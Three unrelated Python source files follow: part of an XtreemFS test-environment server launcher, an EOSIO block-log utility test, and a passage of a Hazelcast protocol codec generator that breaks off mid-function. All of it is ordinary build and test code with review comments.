                return False
            #print "xtestenv: checking if", self.__class__.__name__, "server is running with pid", pid
            try:
                # NOTE(review): waitpid only works for our own children; a pid
                # from a previous run raises OSError and reports "not running".
                pid, exitvalue = os.waitpid(int(pid), os.WNOHANG)
                if pid != 0 and exitvalue != 0:
                    return False
                else:
                    return True
            except OSError:
                return False
        else:
            return False

    def save_status_page(self, to_file_path):
        # Fetches the server's HTTP status page with wget.
        http_port = self.get_http_port()
        os.system("wget -O %(to_file_path)s http://localhost:%(http_port)u" % locals())

    def start(self,
              log_file_path=None):
        # Launches the Java server unless it is already running; writes the
        # child's pid to the pid file and verifies it survived the first second.
        if sys.platform == "win32" or not self.is_running():
            try: os.mkdir(self._run_dir_path)
            except: pass

            pid_file_path = self._get_pid_file_path()

            java_args = [os.path.join(os.environ["JAVA_HOME"], "bin", "java")]

            # Enable assertions.
            java_args.append("-ea")

            # Construct the -cp classpath
            # Prefer jars from the source tree; fall back to system-wide jars.
            XtreemFS_jar_file_path = os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "servers", "dist", "XtreemFS.jar"))
            if os.path.exists(XtreemFS_jar_file_path):
                classpath = (
                             XtreemFS_jar_file_path,
                             os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "lib", "BabuDB.jar")),
                             os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "lib", "protobuf-java-2.5.0.jar")),
                             os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "flease", "dist", "Flease.jar")),
                             os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "foundation", "dist", "Foundation.jar")),
                             os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "lib", "jdmkrt.jar")),
                             os.path.abspath(os.path.join(self._xtreemfs_dir, "java", "lib", "commons-codec-1.3.jar")),
                            )
            else:
                classpath = (
                             os.path.join("/usr/share/java", "XtreemFS.jar"),
                             os.path.join("/usr/share/java", "BabuDB.jar"),
                             os.path.join("/usr/share/java", "protobuf-java-2.5.0.jar"),
                             os.path.join("/usr/share/java", "Flease.jar"),
                             os.path.join("/usr/share/java", "Foundation.jar"),
                             os.path.join("/usr/share/java", "jdmkrt.jar"),
                             os.path.join("/usr/share/java", "commons-codec-1.3.jar"),
                            )
            # Classpath separator differs between Windows and POSIX.
            if sys.platform.startswith("win"):
                classpath = ";".join(classpath)
            else:
                classpath = ":".join(classpath)
            java_args.extend(("-cp", classpath))

            # Name of the class to start
            # e.g. class DIR -> org.xtreemfs.dir.DIR
            java_args.append("org.xtreemfs." + self.__class__.__name__.lower() + "." + self.__class__.__name__.upper())

            # .config file
            java_args.append(self.get_config_file_path())

            # Don't .join java_args, since Popen wants a sequence when shell=False
            if log_file_path is None:
                stderr = sys.stderr
                stdout = sys.stdout
            else:
                # Redirect stderr and stdout to a log file
                stderr = stdout = open(log_file_path, "a")

            #print "xctl: starting", self.__class__.__name__, "server with UUID", self.get_uuid(), "on port", self.get_rpc_port(), "with", " ".join(java_args)
            p = subprocess.Popen(java_args, stdout=stdout, stderr=stderr) # No shell=True: we only want one process (java), not two (/bin/sh and java)
            # returncode is non-None only if the process already exited.
            if p.returncode is not None:
                raise RuntimeError(self.get_uuid() + " failed to start: " + str(p.returncode))

            pidfile = open(pid_file_path, "w+")
            pidfile.write(str(p.pid))
            pidfile.close()

            print "xtestenv: started", self.__class__.__name__, "server with UUID", self.get_uuid(), "on port", self.get_rpc_port(), "with pid", p.pid

            # Give the JVM a moment, then verify it did not die immediately.
            sleep(1.0)

            if not self.is_running():
                raise RuntimeError, self.get_uuid() + " failed to start"
        else:
            print "xtestenv:", self.__class__.__name__, "server with UUID", self.get_uuid(), "is already running"

    def stop(self):
        # Stops the server: TASKKILL on Windows; SIGTERM then SIGKILL on POSIX,
        # retrying each signal up to self._start_stop_retries times.
        pid_file_path = self._get_pid_file_path()
        if os.path.exists(pid_file_path):
            pid = int(open(pid_file_path).read().strip())

            if sys.platform.startswith("win"):
                subprocess.call("TASKKILL /PID %(pid)u /F /T" % locals())
                killed = True
            else:
                killed = False
                for signo in (signal.SIGTERM, signal.SIGKILL):
                    for try_i in xrange(self._start_stop_retries):
                        print "xtestenv: stopping", self.__class__.__name__, "server with pid", pid, "with signal", str(signo) + ", try", try_i
                        try: os.kill(pid, signo)
                        except: pass

                        sleep(0.5)

                        try:
                            if os.waitpid(pid, os.WNOHANG)[0] != 0:
                                killed = True
                                break
                        except OSError:
                            # Process is gone (not our child / already reaped).
                            killed = True
                            break
                        except:
                            # NOTE(review): DEBUG_ME and traceback are not
                            # defined anywhere in this file — this branch would
                            # raise NameError; confirm intended globals.
                            if DEBUG_ME:
                                traceback.print_exc()

                    if killed:
                        break

            if killed:
                os.unlink(pid_file_path)
        else:
            print "xtestenv: no pid file for", self.__class__.__name__, "server"
class DIR(Server):
    """Directory service (DIR): BabuDB-backed, synchronous (FSYNC) logging."""

    def configure(self):
        try:
            os.mkdir(self._data_dir)
        except:
            pass
        self._config.update({
            'babudb.debug.level': self._config['debug.level'],
            'babudb.logDir': self._data_dir,
            'babudb.baseDir': self._data_dir,
            'babudb.sync': 'FSYNC',
            'babudb.worker.maxQueueLength': '250',
            'babudb.worker.numThreads': '0',
            'babudb.maxLogfileSize': '16777216',
            'babudb.checkInterval': '300',
            'babudb.pseudoSyncWait': '200',
            'database.dir': self._data_dir,
            'database.log': self._data_dir,
            'authentication_provider': 'org.xtreemfs.common.auth.NullAuthProvider',
        })
class MRC(Server):
    """Metadata and Replica Catalog (MRC): BabuDB-backed, asynchronous logging."""

    def configure(self,
                  dir_host,
                  dir_port):
        try:
            os.mkdir(self._data_dir)
        except:
            pass
        self._config.update({
            'dir_service.host': dir_host,
            'dir_service.port': dir_port,
            'osd_check_interval': 300,
            'no_atime': 'true',
            'no_fsync': 'true',
            'local_clock_renewal': 0,
            'remote_time_sync': 60000,
            'capability_secret': 'testsecret',
            'database.checkpoint.interval': 1800000,
            'database.checkpoint.idle_interval': 1000,
            'database.checkpoint.logfile_size': 16384,
            'babudb.debug.level': self._config['debug.level'],
            'babudb.logDir': self._data_dir,
            'babudb.baseDir': self._data_dir,
            'babudb.sync': 'ASYNC',
            'babudb.worker.maxQueueLength': '250',
            'babudb.worker.numThreads': '0',
            'babudb.maxLogfileSize': '16777216',
            'babudb.checkInterval': '300',
            'babudb.pseudoSyncWait': '0',
            'database.dir': self._data_dir,
            'database.log': self._data_dir,
            'authentication_provider': 'org.xtreemfs.common.auth.NullAuthProvider',
        })
class OSD(Server):
    """XtreemFS Object Storage Device (OSD) service.

    configure() records the DIR service address and the OSD settings in
    self._config for the generic Server start machinery.
    """

    def configure(self, dir_host, dir_port):
        # Create the data directory; it may already exist from a previous run.
        # Fixed: was a bare `except: pass`; only OSError is expected here.
        try:
            os.mkdir(self._data_dir)
        except OSError:
            pass
        # Where to find the directory service.
        self._config['dir_service.host'] = dir_host
        self._config['dir_service.port'] = dir_port
        self._config['local_clock_renewal'] = 0
        self._config['remote_time_sync'] = 60000
        self._config['capability_secret'] = 'testsecret'
        self._config['report_free_space'] = 'true'
        self._config['checksums.enabled'] = 'false'
        self._config['object_dir'] = self._data_dir
        # Some tests overload the test system, increase timeouts.
        self._config['flease.lease_timeout_ms'] = 60000
        self._config['flease.message_to_ms'] = 2000
|
|
#!/usr/bin/env python3
from testUtils import Utils
from testUtils import BlockLogAction
import time
from Cluster import Cluster
from WalletMgr import WalletMgr
from Node import BlockType
import os
import signal
import subprocess
from TestHelper import AppArgs
from TestHelper import TestHelper
###############################################################
# block_log_util_test
# Test verifies that the blockLogUtil is still compatible with nodeos
###############################################################
Print=Utils.Print
errorExit=Utils.errorExit
from core_symbol import CORE_SYMBOL
def verifyBlockLog(expected_block_num, trimmedBlockLog):
    """Assert that trimmedBlockLog is a contiguous run of blocks starting at
    expected_block_num; each entry must be a dict with a "block_num" key."""
    firstBlockNum = expected_block_num
    for block in trimmedBlockLog:
        # Fixed: the assert message was `print(...)`, which evaluates to None,
        # so a failure reported "AssertionError: None" (and only printed the
        # intended text as a side effect).
        assert 'block_num' in block, "ERROR: eosio-blocklog didn't return block output"
        block_num = block['block_num']
        assert block_num == expected_block_num, \
            "ERROR: expected block number %d but got %d" % (expected_block_num, block_num)
        expected_block_num += 1
    Print("Block_log contiguous from block number %d to %d" % (firstBlockNum, expected_block_num - 1))
appArgs=AppArgs()
# Standard test harness flags: -v verbose, --leave-running keeps nodes alive
# after the test, --clean-run kills any stale instances first.
args = TestHelper.parse_args({"--dump-error-details","--keep-logs","-v","--leave-running","--clean-run"})
Utils.Debug=args.v
# Two producing nodes plus one non-producing node (node 2).
pnodes=2
cluster=Cluster(walletd=True)
dumpErrorDetails=args.dump_error_details
keepLogs=args.keep_logs
dontKill=args.leave_running
# Producers per producing node.
prodCount=2
killAll=args.clean_run
walletPort=TestHelper.DEFAULT_WALLET_PORT
totalNodes=pnodes+1
walletMgr=WalletMgr(True, port=walletPort)
# Set to True only at the very end of the try block; drives shutdown reporting.
testSuccessful=False
killEosInstances=not dontKill
killWallet=not dontKill
WalletdName=Utils.EosWalletName
ClientName="cleos"
try:
    TestHelper.printSystemInfo("BEGIN")
    cluster.setWalletMgr(walletMgr)
    cluster.killall(allInstances=killAll)
    cluster.cleanup()

    Print("Stand up cluster")
    if cluster.launch(prodCount=prodCount, onlyBios=False, pnodes=pnodes, totalNodes=totalNodes, totalProducers=pnodes*prodCount, useBiosBootFile=False) is False:
        Utils.errorExit("Failed to stand up eos cluster.")

    Print("Validating system accounts after bootstrap")
    cluster.validateAccounts(None)

    biosNode=cluster.biosNode
    node0=cluster.getNode(0)
    node1=cluster.getNode(1)

    blockNum=100
    Print("Wait till we at least get to block %d" % (blockNum))
    node0.waitForBlock(blockNum, blockType=BlockType.lib)
    info=node0.getInfo(exitOnError=True)
    headBlockNum=info["head_block_num"]
    lib=info["last_irreversible_block_num"]

    Print("Kill the node we want to verify its block log")
    node0.kill(signal.SIGTERM)

    Print("Wait for node0's head block to become irreversible")
    node1.waitForBlock(headBlockNum, blockType=BlockType.lib)
    infoAfter=node1.getInfo(exitOnError=True)
    headBlockNumAfter=infoAfter["head_block_num"]

    def checkBlockLog(blockLog, blockNumsToFind, firstBlockNum=1):
        """Verify blockLog is contiguous starting at firstBlockNum and return,
        per entry of the ascending list blockNumsToFind, whether it occurs."""
        foundBlockNums=[]
        nextBlockNum=firstBlockNum
        nextIndex=0
        for block in blockLog:
            blockNum=block["block_num"]
            if nextBlockNum!=blockNum:
                Utils.errorExit("BlockLog should progress to the next block number, expected block number %d but got %d" % (nextBlockNum, blockNum))
            if nextIndex<len(blockNumsToFind) and blockNum==blockNumsToFind[nextIndex]:
                foundBlockNums.append(True)
                nextIndex+=1
            nextBlockNum+=1
        # Any remaining block numbers were not present in the log.
        while nextIndex<len(blockNumsToFind):
            foundBlockNums.append(False)
            if nextIndex<len(blockNumsToFind)-1:
                # Fixed: the message formatted the builtin `next` and an unused
                # `previous` variable; report the actual offending values.
                assert blockNumsToFind[nextIndex+1] > blockNumsToFind[nextIndex], \
                    "expects passed in array, blockNumsToFind to increase from smallest to largest, %d is less than or equal to %d" % (blockNumsToFind[nextIndex+1], blockNumsToFind[nextIndex])
            nextIndex+=1
        return foundBlockNums

    Print("Retrieve the whole blocklog for node 0")
    blockLog=cluster.getBlockLog(0)
    foundBlockNums=checkBlockLog(blockLog, [headBlockNum, headBlockNumAfter])
    # Fixed: these messages referenced `output` (not defined until later) and
    # passed the boolean found-flags where the block numbers were intended.
    assert foundBlockNums[0], "Couldn't find \"%d\" in blocklog:\n\"%s\"\n" % (headBlockNum, blockLog)
    assert not foundBlockNums[1], "Should not find \"%d\" in blocklog:\n\"%s\"\n" % (headBlockNumAfter, blockLog)

    output=cluster.getBlockLog(0, blockLogAction=BlockLogAction.smoke_test)
    expectedStr="no problems found"
    assert output.find(expectedStr) != -1, "Couldn't find \"%s\" in:\n\"%s\"\n" % (expectedStr, output)

    blockLogDir=Utils.getNodeDataDir(0, "blocks")
    duplicateIndexFileName=os.path.join(blockLogDir, "duplicate.index")
    output=cluster.getBlockLog(0, blockLogAction=BlockLogAction.make_index, outputFile=duplicateIndexFileName)
    assert output is not None, "Couldn't make new index file \"%s\"\n" % (duplicateIndexFileName)

    blockIndexFileName=os.path.join(blockLogDir, "blocks.index")
    # Compare the freshly generated index byte-for-byte with the original.
    # Fixed: the handles were previously opened and never closed.
    with open(blockIndexFileName,"rb") as blockIndexFile, open(duplicateIndexFileName,"rb") as duplicateIndexFile:
        blockIndexStr=blockIndexFile.read()
        duplicateIndexStr=duplicateIndexFile.read()
    # Fixed: the format string was malformed (`\%%s\"` yields a literal "%s")
    # leaving one conversion for two arguments, so a failing assert raised
    # TypeError instead of reporting the mismatch.
    assert blockIndexStr==duplicateIndexStr, "Generated file \"%s\" didn't match original \"%s\"" % (duplicateIndexFileName, blockIndexFileName)

    try:
        Print("Head block num %d will not be in block log (it will be in reversible DB), so --trim will throw an exception" % (headBlockNum))
        output=cluster.getBlockLog(0, blockLogAction=BlockLogAction.trim, last=headBlockNum, throwException=True)
        # Fixed: `%` bound only to the second string literal (which has no
        # conversion specifier), so reaching this line raised TypeError.
        Utils.errorExit(("BlockLogUtil --trim should have indicated error for last value set to lib (%d) " +
                         "which should not do anything since only trimming blocklog and not irreversible blocks") % (lib))
    except subprocess.CalledProcessError as ex:
        pass

    beforeEndOfBlockLog=lib-20
    Print("Block num %d will definitely be at least one block behind the most recent entry in block log, so --trim will work" % (beforeEndOfBlockLog))
    output=cluster.getBlockLog(0, blockLogAction=BlockLogAction.trim, last=beforeEndOfBlockLog, throwException=True)

    Print("Kill the non production node, we want to verify its block log")
    cluster.getNode(2).kill(signal.SIGTERM)

    Print("Trim off block num 1 to remove genesis block from block log.")
    output=cluster.getBlockLog(2, blockLogAction=BlockLogAction.trim, first=2, throwException=True)
    Print("Smoke test the trimmed block log.")
    output=cluster.getBlockLog(2, blockLogAction=BlockLogAction.smoke_test)
    Print("Analyze block log.")
    trimmedBlockLog=cluster.getBlockLog(2, blockLogAction=BlockLogAction.return_blocks)
    verifyBlockLog(2, trimmedBlockLog)

    # relaunch the node with the truncated block log and ensure it catches back up with the producers
    current_head_block_num = node1.getInfo()["head_block_num"]
    cluster.getNode(2).relaunch(cachePopen=True)
    assert cluster.getNode(2).waitForBlock(current_head_block_num, timeout=60, reportInterval=15)

    # ensure it continues to advance
    current_head_block_num = node1.getInfo()["head_block_num"]
    assert cluster.getNode(2).waitForBlock(current_head_block_num, timeout=60, reportInterval=15)
    info = cluster.getNode(2).getInfo()

    # Block 2 is the first block still in the log; block 1 (genesis) was trimmed off.
    block = cluster.getNode(2).getBlock(2)
    assert block is not None
    block = cluster.getNode(2).getBlock(1, silentErrors=True)
    assert block is None

    # verify it shuts down cleanly
    cluster.getNode(2).interruptAndVerifyExitStatus()

    firstBlock = info["last_irreversible_block_num"]
    Print("Trim off block num %s." % (firstBlock))
    output=cluster.getBlockLog(2, blockLogAction=BlockLogAction.trim, first=firstBlock, throwException=True)
    Print("Smoke test the trimmed block log.")
    output=cluster.getBlockLog(2, blockLogAction=BlockLogAction.smoke_test)
    Print("Analyze block log.")
    trimmedBlockLog=cluster.getBlockLog(2, blockLogAction=BlockLogAction.return_blocks)
    verifyBlockLog(firstBlock, trimmedBlockLog)

    # relaunch the node with the truncated block log and ensure it catches back up with the producers
    current_head_block_num = node1.getInfo()["head_block_num"]
    assert current_head_block_num >= info["head_block_num"]
    cluster.getNode(2).relaunch(cachePopen=True)
    assert cluster.getNode(2).waitForBlock(current_head_block_num, timeout=60, reportInterval=15)

    # ensure it continues to advance
    current_head_block_num = node1.getInfo()["head_block_num"]
    assert cluster.getNode(2).waitForBlock(current_head_block_num, timeout=60, reportInterval=15)
    info = cluster.getNode(2).getInfo()
    block = cluster.getNode(2).getBlock(firstBlock)
    assert block is not None
    block = cluster.getNode(2).getBlock(firstBlock - 1, silentErrors=True)
    assert block is None
    block = cluster.getNode(2).getBlock(1, silentErrors=True)
    assert block is None

    # verify it shuts down cleanly
    cluster.getNode(2).interruptAndVerifyExitStatus()

    # Corrupt node 0's blocks.log by dropping its last byte, then verify that
    # fix_irreversible_blocks repairs it.
    blockLogFileName=os.path.join(blockLogDir, "blocks.log")
    blockIndexFileSize = os.path.getsize(blockIndexFileName)
    blockLogFileSize = os.path.getsize(blockLogFileName)
    # truncate blocks.log by 1 byte (fixed: handle is now closed deterministically)
    with open(blockLogFileName, 'a') as blockLogFile:
        blockLogFile.truncate(blockLogFileSize - 1)
    truncatedBlockLogFileSize = os.path.getsize(blockLogFileName)
    assert truncatedBlockLogFileSize == blockLogFileSize - 1, "blocks.log not truncated properly\n"

    # fix_irreversible_blocks
    output=cluster.getBlockLog(0, blockLogAction=BlockLogAction.fix_irreversible_blocks)
    output=cluster.getBlockLog(0, blockLogAction=BlockLogAction.smoke_test)
    expectedStr="no problems found"
    assert output.find(expectedStr) != -1, "Couldn't find \"%s\" in:\n\"%s\"\n" % (expectedStr, output)

    testSuccessful=True
finally:
    TestHelper.shutdown(cluster, walletMgr, testSuccessful=testSuccessful, killEosInstances=killEosInstances, killWallet=killWallet, keepLogs=keepLogs, cleanRun=killAll, dumpErrorDetails=dumpErrorDetails)

exit(0)
|
|
import hashlib
import json
import re
from enum import Enum
from os import listdir, makedirs
from os.path import dirname, isfile, join, realpath
import jsonschema
import yaml
from jinja2 import Environment, PackageLoader
from yaml import MarkedYAMLError
from binary import FixedEntryListTypes, FixedLengthTypes, FixedListTypes, FixedMapTypes
from cpp import cpp_ignore_service_list, cpp_types_decode, cpp_types_encode, get_size, is_trivial
from cs import cs_escape_keyword, cs_ignore_service_list, cs_types_decode, cs_types_encode
from java import java_types_decode, java_types_encode
from md import internal_services
from py import (
py_escape_keyword,
py_get_import_path_holders,
py_ignore_service_list,
py_param_name,
py_types_encode_decode,
)
from ts import (
ts_escape_keyword,
ts_get_import_path_holders,
ts_ignore_service_list,
ts_types_decode,
ts_types_encode,
)
# A "major.minor.patch" version is packed into one comparable integer as
# major*10000 + minor*100 + patch (see version_to_number below).
MAJOR_VERSION_MULTIPLIER = 10000
MINOR_VERSION_MULTIPLIER = 100
PATCH_VERSION_MULTIPLIER = 1
def java_name(type_name):
    """Convert a snake_case protocol name to the Java PascalCase form."""
    pieces = type_name.split("_")
    return "".join(piece[0].capitalize() + piece[1:] for piece in pieces)
def cs_name(type_name):
    """Convert a snake_case protocol name (parentheses stripped) to C# PascalCase."""
    cleaned = type_name.replace("(", "").replace(")", "")
    return "".join(piece[0].capitalize() + piece[1:] for piece in cleaned.split("_"))
def cpp_name(type_name):
    """Convert a snake_case protocol name (parentheses stripped) to C++ PascalCase."""
    without_parens = type_name.replace("(", "").replace(")", "")
    parts = without_parens.split("_")
    return "".join(part[0].capitalize() + part[1:] for part in parts)
def param_name(type_name):
    """Lower-case the first character (PascalCase -> camelCase)."""
    head, tail = type_name[0], type_name[1:]
    return head.lower() + tail
def is_fixed_type(param):
    """True if the parameter's type is one of the fixed-length primitive types."""
    param_type = param["type"]
    return param_type in FixedLengthTypes
def capital(txt):
    """Capitalize only the first character, leaving the rest untouched."""
    first = txt[0]
    return first.capitalize() + txt[1:]
def to_upper_snake_case(camel_case_str):
    """Convert camelCase/PascalCase to UPPER_SNAKE_CASE, keeping acronym runs intact."""
    # Insert "_" before an upper-case letter that either follows a lower-case
    # letter/digit, or starts a new lower-case word (ends an acronym run),
    # then upper-case the whole result.
    snake = re.sub("((?<=[a-z0-9])[A-Z]|(?!^)[A-Z](?=[a-z]))", r"_\1", camel_case_str)
    return snake.upper()
def version_to_number(major, minor, patch=0):
    """Encode a semantic version as one comparable integer, e.g. 2.1.3 -> 20103."""
    encoded = MAJOR_VERSION_MULTIPLIER * major
    encoded += MINOR_VERSION_MULTIPLIER * minor
    encoded += PATCH_VERSION_MULTIPLIER * patch
    return encoded
def get_version_as_number(version):
    """Parse a "major.minor[.patch]" version (str or number) into its numeric encoding."""
    text = version if isinstance(version, str) else str(version)
    components = [int(piece) for piece in text.split(".")]
    return version_to_number(*components)
def fixed_params(params):
    """Subset of params whose types are fixed-length."""
    return list(filter(is_fixed_type, params))
def var_size_params(params):
    """Subset of params whose types are variable-length."""
    return [param for param in params if not is_fixed_type(param)]
def new_params(since, params):
    """
    Return the parameters that were added later than the given version.

    Parameters always precede any parameter added later, so a simple
    inequality between the "since" values of the method and the parameter
    is sufficient.
    """
    return list(filter(lambda param: param["since"] != since, params))
def filter_new_params(params, version):
    """
    Keep only the parameters introduced at or before the given version.
    """
    cutoff = get_version_as_number(version)
    return [param for param in params
            if get_version_as_number(param["since"]) <= cutoff]
def generate_codecs(services, template, output_dir, lang, env):
    """Render a codec for every method of every service.

    For C++, all codecs are concatenated into codecs.h / codecs.cpp between a
    fixed header and footer; every other language gets one file per method.
    Services/methods on the per-language ignore list are skipped, as are
    methods whose templates raise NotImplementedError (missing type mapping).
    """
    makedirs(output_dir, exist_ok=True)
    # Message ids are 3 bytes: service id, method id, message kind
    # (0 = request, 1 = response, 2+ = events).
    id_fmt = "0x%02x%02x%02x"
    if lang is SupportedLanguages.CPP:
        curr_dir = dirname(realpath(__file__))
        cpp_dir = "%s/cpp" % curr_dir
        # Fixed: these handles were opened without ever being closed.
        with open(join(cpp_dir, "header_includes.txt"), "r") as f:
            save_file(join(output_dir, "codecs.h"), f.read(), "w")
        with open(join(cpp_dir, "source_header.txt"), "r") as f:
            save_file(join(output_dir, "codecs.cpp"), f.read(), "w")
    for service in services:
        if service["name"] in language_service_ignore_list[lang]:
            print("[%s] is in ignore list so ignoring it." % service["name"])
            continue
        if "methods" in service:
            methods = service["methods"]
            if methods is None:
                # Fixed: concatenating the service dict to a str raised a
                # TypeError instead of the intended NotImplementedError.
                raise NotImplementedError("Methods not found for service " + service["name"])
        for method in service["methods"]:
            if (service["name"] + "." + method["name"]) in language_service_ignore_list[lang]:
                print(
                    "[%s] is in ignore list so ignoring it."
                    % (service["name"] + "." + method["name"])
                )
                continue
            method["request"]["id"] = int(id_fmt % (service["id"], method["id"], 0), 16)
            method["response"]["id"] = int(id_fmt % (service["id"], method["id"], 1), 16)
            events = method.get("events", None)
            if events is not None:
                for i in range(len(events)):
                    method["events"][i]["id"] = int(
                        id_fmt % (service["id"], method["id"], i + 2), 16
                    )
            codec_file_name = file_name_generators[lang](service["name"], method["name"])
            try:
                if lang is SupportedLanguages.CPP:
                    codec_template = env.get_template("codec-template.h.j2")
                    content = codec_template.render(service_name=service["name"], method=method)
                    save_file(join(output_dir, "codecs.h"), content, "a+")
                    codec_template = env.get_template("codec-template.cpp.j2")
                    content = codec_template.render(service_name=service["name"], method=method)
                    save_file(join(output_dir, "codecs.cpp"), content, "a+")
                else:
                    content = template.render(service_name=service["name"], method=method)
                    save_file(join(output_dir, codec_file_name), content)
            except NotImplementedError:
                print("[%s] contains missing type mapping so ignoring it." % codec_file_name)
    if lang is SupportedLanguages.CPP:
        # Append the shared footer to both generated files.
        with open(join(cpp_dir, "footer.txt"), "r") as f:
            content = f.read()
        save_file(join(output_dir, "codecs.h"), content, "a+")
        save_file(join(output_dir, "codecs.cpp"), content, "a+")
def generate_custom_codecs(services, template, output_dir, lang, env):
    """Render codecs for the custom (shared) protocol types.

    C++ emits a header/source pair per custom type; every other language emits
    a single file per custom type. Types whose templates raise
    NotImplementedError (missing type mapping) are skipped with a message.
    """
    makedirs(output_dir, exist_ok=True)
    if lang == SupportedLanguages.CPP:
        cpp_header_template = env.get_template("custom-codec-template.h.j2")
        cpp_source_template = env.get_template("custom-codec-template.cpp.j2")
    for service in services:
        if "customTypes" in service:
            custom_types = service["customTypes"]
            for codec in custom_types:
                try:
                    if lang == SupportedLanguages.CPP:
                        file_name_prefix = codec["name"].lower() + "_codec"
                        header_file_name = file_name_prefix + ".h"
                        source_file_name = file_name_prefix + ".cpp"
                        # codec_file_name tracks the file currently being rendered
                        # so the except clause below reports the right one.
                        codec_file_name = header_file_name
                        content = cpp_header_template.render(codec=codec)
                        save_file(join(output_dir, header_file_name), content)
                        codec_file_name = source_file_name
                        content = cpp_source_template.render(codec=codec)
                        save_file(join(output_dir, source_file_name), content)
                    else:
                        codec_file_name = file_name_generators[lang](codec["name"])
                        content = template.render(codec=codec)
                        save_file(join(output_dir, codec_file_name), content)
                except NotImplementedError:
                    print("[%s] contains missing type mapping so ignoring it." % codec_file_name)
def generate_documentation(services, custom_definitions, template, output_dir):
    """Render the protocol documentation page, skipping internal services."""
    makedirs(output_dir, exist_ok=True)
    public_services = [s for s in services if s["name"] not in internal_services]
    content = template.render(
        services=public_services,
        custom_definitions=custom_definitions,
    )
    out_path = join(output_dir, "documentation.md")
    with open(out_path, "w", newline="\n") as out:
        out.writelines(content)
def item_type(lang_name, param_type):
    """Language-specific element type of a List_/ListCN_ type name.

    NOTE(review): returns None for any non-list type; callers appear to use
    this for list types only — confirm before relying on the None fallthrough.
    """
    if param_type.startswith(("List_", "ListCN_")):
        element = param_type.split("_", 1)[1]
        return lang_name(element)
    return None
def key_type(lang_name, param_type):
    """Language-specific key type of a Map_/EntryList_ style type name."""
    key_part = param_type.split("_", 2)[1]
    return lang_name(key_part)
def value_type(lang_name, param_type):
    """Language-specific value type of a Map_/EntryList_ style type name."""
    value_part = param_type.split("_", 2)[2]
    return lang_name(value_part)
def is_var_sized_list(param_type):
    """True for List_ types that are not among the fixed-entry-size lists."""
    if not param_type.startswith("List_"):
        return False
    return param_type not in FixedListTypes
def is_var_sized_list_contains_nullable(param_type):
    """True for ListCN_ (list-contains-nullable) types that are not fixed-size."""
    if not param_type.startswith("ListCN_"):
        return False
    return param_type not in FixedListTypes
def is_var_sized_map(param_type):
    """True for Map_ types that are not among the fixed-size maps."""
    if not param_type.startswith("Map_"):
        return False
    return param_type not in FixedMapTypes
def is_var_sized_entry_list(param_type):
    """True for EntryList_ types that are not among the fixed-size entry lists."""
    if not param_type.startswith("EntryList_"):
        return False
    return param_type not in FixedEntryListTypes
def load_services(protocol_def_dir):
    """Load every protocol-definition YAML file in the directory; returns the
    parsed documents as a list of dicts. Exits the process on a YAML error.

    NOTE(review): os.listdir order is platform-dependent, while
    validate_services() expects each service's id to equal its index in this
    list — presumably the filesystem order happens to match; confirm.
    """
    service_list = listdir(protocol_def_dir)
    services = []
    for service_file in service_list:
        file_path = join(protocol_def_dir, service_file)
        if isfile(file_path):
            with open(file_path, "r") as file:
                try:
                    # yaml.Loader can construct arbitrary objects; acceptable only
                    # because the definitions are trusted, repo-local files.
                    data = yaml.load(file, Loader=yaml.Loader)
                except MarkedYAMLError as err:
                    print(err)
                    exit(-1)
            services.append(data)
    return services
def validate_services(services, schema_path, no_id_check, protocol_versions):
    """Validate every service document against the JSON schema and, unless
    no_id_check is set, verify service/method id ordering and the version
    semantics of every request/response/event parameter list.

    Returns True when everything checks out. A schema failure aborts
    immediately; other problems are printed and accumulated into `valid`.
    """
    valid = True
    with open(schema_path, "r") as schema_file:
        schema = json.load(schema_file)
    for i in range(len(services)):
        service = services[i]
        if not validate_against_schema(service, schema):
            return False
        if not no_id_check:
            # Validate id ordering of services.
            # Service ids must equal the service's position in the list.
            service_id = service["id"]
            if i != service_id:
                print(
                    "Check the service id of the %s. Expected: %s, found: %s."
                    % (service["name"], i, service_id)
                )
                valid = False
            # Validate id ordering of definition methods.
            # Method ids are 1-based within a service.
            methods = service["methods"]
            for j in range(len(methods)):
                method = methods[j]
                method_id = method["id"]
                if (j + 1) != method_id:
                    print(
                        "Check the method id of %s#%s. Expected: %s, found: %s"
                        % (service["name"], method["name"], (j + 1), method_id)
                    )
                    valid = False
                # Parameters must be ordered by "since" and each version must
                # follow on from one that exists in protocol_versions.
                request_params = method["request"].get("params", [])
                method_name = service["name"] + "#" + method["name"]
                if not is_parameters_ordered_and_semantically_correct(
                    method["since"], method_name + "#request", request_params, protocol_versions
                ):
                    valid = False
                response_params = method["response"].get("params", [])
                if not is_parameters_ordered_and_semantically_correct(
                    method["since"],
                    method_name + "#response",
                    response_params,
                    protocol_versions,
                ):
                    valid = False
                events = method.get("events", [])
                for event in events:
                    event_params = event.get("params", [])
                    if not is_parameters_ordered_and_semantically_correct(
                        event["since"],
                        method_name + "#" + event["name"] + "#event",
                        event_params,
                        protocol_versions,
                    ):
                        valid = False
    return valid
def is_semantically_correct_param(version, protocol_versions):
    """Check that `version` (numeric encoding) follows on from a version that
    actually exists in protocol_versions, i.e. no version was skipped."""
    is_semantically_correct = True
    if version != protocol_versions[0]:
        # Not 2.0 (the first protocol version).
        if version % MINOR_VERSION_MULTIPLIER == 0:
            # Minor version
            if (version - MINOR_VERSION_MULTIPLIER) not in protocol_versions:
                # since is set to 2.x but 2.(x-1) is not in the protocol definitions
                is_semantically_correct = False
        elif version % PATCH_VERSION_MULTIPLIER == 0:
            # Patch version
            # NOTE(review): PATCH_VERSION_MULTIPLIER is 1, so `x % 1 == 0` is
            # always true and this branch acts as a plain `else`.
            if (version - PATCH_VERSION_MULTIPLIER) not in protocol_versions:
                # since is set to 2.x.y but 2.x.(y-1) is not in the protocol definitions
                is_semantically_correct = False
    return is_semantically_correct
def is_parameters_ordered_and_semantically_correct(since, name, params, protocol_versions):
    """Check a parameter list: every "since" version must exist semantically
    (see is_semantically_correct_param) and params must be in non-decreasing
    "since" order relative to the owning method/event's version.

    `name` is a "Service#method#request"-style label used only for messages.
    Returns True only when both properties hold; problems are printed.
    """
    is_ordered = True
    is_semantically_correct = True
    version = get_version_as_number(since)
    if not is_semantically_correct_param(version, protocol_versions):
        # Strip the trailing "#request"/"#response"/"#event" part for the message.
        method_or_event_name = name[: name.rindex("#")]
        print(
            'Check the since value of the "%s"\n'
            'It is set to version "%s" but this protocol version does '
